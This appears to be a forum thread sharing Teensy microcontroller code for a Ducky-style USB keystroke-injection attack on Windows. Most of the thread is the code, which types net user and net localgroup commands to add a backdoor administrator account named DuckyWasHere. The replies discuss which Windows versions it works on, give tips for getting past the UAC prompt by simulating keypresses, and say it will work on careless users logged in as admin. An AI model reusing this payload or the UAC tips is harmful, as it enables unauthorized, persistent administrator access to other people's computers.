[Version 1] [code][windows] Create New Admin Account In Windows.

Here's another version of w02057's Ducky Script. I'm still learning this whole coding thing, so bear with me. I'm not sure what his code was written in (C??) so I just remade it. There's still no minimizing of the command prompt, but the window doesn't stay open for very long anyway. Feel free to contribute. Credit goes to w02057 tho. :)

Oh, and can someone tell me what kind of code is below??

// DUCKY_WAS_HERE - Teensy
// Based on w02057's Ducky script (Pretty much the exact same thing) - 5/7/2010 - 3:30PM

int ledPin = 11;

void setup() {

pinMode(ledPin, OUTPUT); // put this before other led commands or the LED will be dim

ledstart(); // lights up when connected
delay(3000); // delay for computer
ledstart(); // lights up when payload starts
Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.send_now();
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_key2(0);
Keyboard.send_now();
d(); // this is a 100ms delay, see below for commands.
Keyboard.print("cmd"); // Opens cmd prompt
d();
enter();
delay(1000); // delay for prompt to load
Keyboard.print("net user DuckyWasHere quackquack /add"); //First command (Username/Password)
Keyboard.send_now();
enter();
d();
Keyboard.print("net localgroup Administrators DuckyWasHere /add"); //Second command
Keyboard.send_now();
enter();
d();
Keyboard.print("exit"); //Exit cmd
Keyboard.send_now();
enter();
d();
}

void loop() {
  // Maybe a flashing LED?
}

void enter() {
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void sendClearKeys() {
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

// LED command for end of script.
void ledend(){

Keyboard.set_key1(0);
Keyboard.set_key2(0);
Keyboard.set_modifier(0);
Keyboard.send_now();

digitalWrite(ledPin, HIGH);
delay (500);
digitalWrite(ledPin, LOW);
delay (500);
delay (500);
}
// LED command for start of script
void ledstart(){

delay (1000);
}
// delay 100ms
void d(){
delay(100);
}

This should work for XP, but on 7 it won't you need to run cmd as admin for these commands to work. not too sure about vista but i have a feeling it is the same as 7 with this.

Are you sure that it will work on XP? I've just tried the raw commands and it failed. It's not possible for a Limited user to create a user account via net user ... then add it to the local admins group. If it was possible, it would be a huge security hole.

This brings up something about the Ducky which has been perplexing me. I use my laptop whilst logged on as a Limited user. I rarely log on with Admin rights, preferring to use runas /user:..... I guess that all the code that would do anything "interesting" would have to be run whilst the user is logged on with Admin rights (unless something from Metasploit was included in the code). As far as I am aware, the Ducky is simply typing very quickly so, if I couldn't do something nefarious whilst sat at the user's keyboard, why would a Ducky?

Bottom line: I suspect that the hope is that an unsuspecting victim is logged on with Admin rights if the Ducky is going to do it's "stuff"?

if you know a way to fix it, feel free to add to it....

The best way to do it is to find cmd in the start menu then use ctrl+shift and enter to run as admin, you also need to send left and enter to accept the UAC, I did something like this here

Are you sure that it will work on XP? I've just tried the raw commands and it failed. It's not possible for a Limited user to create a user account via net user

Very good point.

I use my laptop whilst logged on as a Limited user. I rarely log on with Admin rights, preferring to use runas /user:.....

You are smart, but dumb users aren't that smart. so it will still work for most common users.